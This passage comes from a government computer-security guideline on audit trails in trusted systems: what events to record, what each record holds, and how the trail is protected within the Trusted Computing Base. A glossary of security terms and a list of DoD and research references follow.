objects from the system, system administrator actions, and any
other events that attempt to violate the security policy of the
system.  The option should exist that either all activities be
audited or that the system security administrator select the
events to be audited.  If it is decided that all activities
should be audited, there are overhead factors to be considered. 
A total audit generally requires more storage space and more
operator maintenance to prevent any loss of data and to provide
adequate protection.  A requirement exists that
authorized personnel shall be able to read all events recorded on
the audit trail.  Analysis of the total audit trail would be both
a difficult and time-consuming task for the administrator.  Thus,
a selection option is required which may be either a
pre-selection or post-selection option.   

The audit trail information should be sufficient to reconstruct a
complete sequence of security-relevant events and processes for a
system.  To do this, the audit trail shall contain the following 
information:  date and time of the event, user, type of event, 
success or failure of the event, the origin of the request, the
name of the object introduced into the user's address space,
accessed, or deleted from the storage system, and at the B1 class
and above, the sensitivity determination of the object. 

It should be remembered that the audit trail shall be included in
the Trusted Computing Base and shall be accorded the same
protection as the TCB.  The audit trail shall be subject to
strict access controls. 

An effective audit trail is necessary in order to detect and 
evaluate hostile attacks on a system.    

GLOSSARY

Administrator - Any one of a group of personnel assigned to 
supervise all or a portion of an ADP system.   

Archive - To file or store records off-line. 

Audit - To conduct the independent review and examination of 
system records and activities. 

Auditor - An authorized individual with administrative duties,
whose duties include selecting the events to be audited on the
system, setting up the audit flags which enable the recording of
those events, and analyzing the trail of audit events.(2) 

Audit Mechanism - The device used to collect, review, and/or
examine system activities. 

Audit Trail - A set of records that collectively provide
documentary evidence of processing used to aid in tracing from
original transactions forward to related records and reports,
and/or backwards from records and reports to their component
source transactions.(1) 

Auditable Event - Any event that can be selected for inclusion in
the audit trail.  These events should include, in addition to 
security-relevant events, events taken to recover the system
after failure and any events that might prove to be
security-relevant at a later time.  

Authenticated User - A user who has accessed an ADP system with a
valid identifier and authentication combination.  

Automatic Data Processing (ADP) System - An assembly of computer 
hardware, firmware, and software configured for the purpose of 
classifying, sorting, calculating, computing, summarizing, 
transmitting and receiving, storing, and retrieving data with a 
minimum of human intervention.(1) 

Category - A grouping of classified or unclassified sensitive 
information, to which an additional restrictive label is applied 
(e.g., proprietary, compartmented information) to signify that 
personnel are granted access to the information only if they have
formal approval or other appropriate authorization.(4)  

Covert Channel - A communication channel that allows a process to 
transfer information in a manner that violates the system's
security policy.(1) 

Covert Storage Channel - A covert channel that involves the
direct or indirect writing of a storage location by one process
and the direct or indirect reading of the storage location by
another process.  Covert storage channels typically involve a
finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.(1) 

Covert Timing Channel - A covert channel in which one process 
signals information to another by modulating its own use of
system resources (e.g., CPU time) in such a way that this
manipulation affects the real response time observed by the
second process.(1) 

Flaw - An error of commission, omission or oversight in a system 
that allows protection mechanisms to be bypassed.(1) 

Object - A passive entity that contains or receives information. 
Access to an object potentially implies access to the information
it contains.  Examples of objects are:  records, blocks, pages, 
segments, files, directories, directory trees and programs, as
well as bits, bytes, words, fields, processors, video displays, 
keyboards, clocks, printers, network nodes, etc.(1) 

Post-Selection - Selection, by authorized personnel, of specified
events that had been recorded on the audit trail. 

Pre-Selection - Selection, by authorized personnel, of the
auditable events that are to be recorded on the audit trail. 

Security Level - The combination of a hierarchical classification
and a set of non-hierarchical categories that represents the 
sensitivity of information.(1) 

Security Policy - The set of laws, rules, and practices that 
regulate how an organization manages, protects, and distributes 
sensitive information.(1) 

Security-Relevant Event - Any event that attempts to change the 
security state of the system (e.g., change discretionary access 
controls, change the security level of a subject, change a user 
password, etc.).  Also, any event that attempts to violate the 
security policy of the system (e.g., too many attempts to log in, 
attempts to violate the mandatory access control limits of a 
device, attempts to downgrade a file, etc.).(1) 

Sensitive Information - Information that, as determined by a 
competent authority, must be protected because its unauthorized 
disclosure, alteration, loss, or destruction will at least cause 
perceivable damage to someone or something.(1) 

Subject - An active entity, generally in the form of a person,  
process, or device that causes information to flow among objects
or changes the system state.  Technically, a process/domain
pair.(1) 

Subject Sensitivity Level - The sensitivity level of the objects
to which the subject has both read and write access.  A subject's
sensitivity level must always be less than or equal to the
clearance of the user the subject is associated with.(4) 

System Security Administrator - The person responsible for the 
security of an Automated Information System and having the
authority to enforce the security safeguards on all others who
have access to the Automated Information System.(4)  

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.(1) 

User - Any person who interacts directly with a computer
system.(1) 

REFERENCES 

1.    National Computer Security Center, DoD Trusted Computer    
      System Evaluation Criteria, DoD, DoD 5200.28-STD, 1985. 

2.    Gligor, Virgil D., "Guidelines for Trusted Facility        
      Management and Audit," University of Maryland, 1985. 

3.    Brown, Leonard R., "Guidelines for Audit Log Mechanisms in 
      Secure Computer Systems," Technical Report                 
      TR-0086A(2770-29)-1, The Aerospace Corporation, 1986. 

4.    Subcommittee on Automated Information System Security,     
      Working Group #3, "Dictionary of Computer Security         
      Terminology," 23 November 1986. 

5.    National Computer Security Center, Criterion               
      Interpretation, Report No. C1-C1-02-87, 1987. 
